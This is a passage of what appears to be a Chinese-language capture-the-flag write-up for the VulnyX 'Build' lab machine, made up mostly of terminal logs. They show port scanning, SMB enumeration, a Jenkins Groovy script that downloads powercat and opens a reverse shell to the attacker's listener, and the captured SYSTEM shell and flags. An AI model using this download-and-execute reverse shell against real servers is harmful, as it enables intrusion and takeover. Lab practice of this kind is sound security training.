靶场练习-vulnyx：Build

┌──(root㉿kali)-[~]

└─# nmap -p- -sV -T4 10.10.10.8 

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-22 04:27 EDT

Nmap scan report for 10.10.10.8

Host is up (0.00037s latency).

Not shown: 65523 closed tcp ports (reset)

PORT      STATE SERVICE       VERSION

80/tcp    open  http          Microsoft IIS httpd 10.0

135/tcp   open  msrpc         Microsoft Windows RPC

139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn

445/tcp   open  microsoft-ds?

8080/tcp  open  http          Jetty 12.0.19

49664/tcp open  msrpc         Microsoft Windows RPC

49665/tcp open  msrpc         Microsoft Windows RPC

49666/tcp open  msrpc         Microsoft Windows RPC

49667/tcp open  msrpc         Microsoft Windows RPC

49668/tcp open  msrpc         Microsoft Windows RPC

49669/tcp open  msrpc         Microsoft Windows RPC

49670/tcp open  msrpc         Microsoft Windows RPC

MAC Address: 08:00:27:F0:28:66 (Oracle VirtualBox virtual NIC)

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 119.38 seconds

┌──(root㉿kali)-[~]

└─# rpcclient -NU "" 10.10.10.8 -c "srvinfo"

Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

┌──(root㉿kali)-[~]

└─# netexec smb 10.10.10.8   

[*] First time use detected

[*] Creating home directory structure

[*] Creating missing folder logs

[*] Creating missing folder modules

[*] Creating missing folder protocols

[*] Creating missing folder workspaces

[*] Creating missing folder obfuscated_scripts

[*] Creating missing folder screenshots

[*] Creating missing folder logs/sam

[*] Creating missing folder logs/lsa

[*] Creating missing folder logs/ntds

[*] Creating missing folder logs/dpapi

[*] Creating default workspace

[*] Initializing SSH protocol database

[*] Initializing WINRM protocol database

[*] Initializing SMB protocol database

[*] Initializing LDAP protocol database

[*] Initializing RDP protocol database

[*] Initializing NFS protocol database

[*] Initializing WMI protocol database

[*] Initializing FTP protocol database

[*] Initializing VNC protocol database

[*] Initializing MSSQL protocol database

[*] Copying default configuration file

SMB         10.10.10.8      445    BUILD            [*] Windows 10 / Server 2019 Build 19041 x64 (name:BUILD) (domain:BUILD) (signing:False) (SMBv1:False)

操作系统：Windows 10 或 Server 2019

系统版本：Build 19041 x64

计算机名：BUILD

域名：BUILD

SMB 签名：False（未开启，存在安全风险）

SMBv1：False（已禁用，安全性较好）

┌──(root㉿kali)-[~]

└─# smbclient -NL //10.10.10.8    

session setup failed: NT_STATUS_ACCESS_DENIED

┌──(root㉿kali)-[~]

└─# smbmap --no-banner -H 10.10.10.8 -u '' -p ''

[*] Detected 1 hosts serving SMB

[*] Established 0 SMB session(s)                                

┌──(root㉿kali)-[~]

└─# netexec smb 10.10.10.8 -u '' -p ''

SMB         10.10.10.8      445    BUILD            [*] Windows 10 / Server 2019 Build 19041 x64 (name:BUILD) (domain:BUILD) (signing:False) (SMBv1:False) 

SMB         10.10.10.8      445    BUILD            [-] BUILD\: STATUS_ACCESS_DENIED

┌──(root㉿kali)-[~]

└─# python3 -m http.server 9527

Serving HTTP on 0.0.0.0 port 9527 (http://0.0.0.0:9527/) ...

println "powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.10.10.9:9527/powercat.ps1'); powercat -c 10.10.10.9 -p 4444 -e cmd".execute().text

┌──(root㉿kali)-[~]

└─# nc -lnvp 4444

listening on [any] 4444 ...

connect to [10.10.10.9] from (UNKNOWN) [10.10.10.8] 62587

Microsoft Windows [Version 10.0.19045.2965]

(c) Microsoft Corporation. All rights reserved.

C:\Program Files\Jenkins>whoami

whoami

nt authority\system

C:\Program Files\Jenkins>type C:\users\builder\Desktop\user.txt

type C:\users\builder\Desktop\user.txt

17a6390c294493b8fc423154791cdd0b 

C:\Program Files\Jenkins>type C:\users\administrator\Desktop\root.txt

type C:\users\administrator\Desktop\root.txt

927c9a24e72f5d76ffd8bc9c2477d10f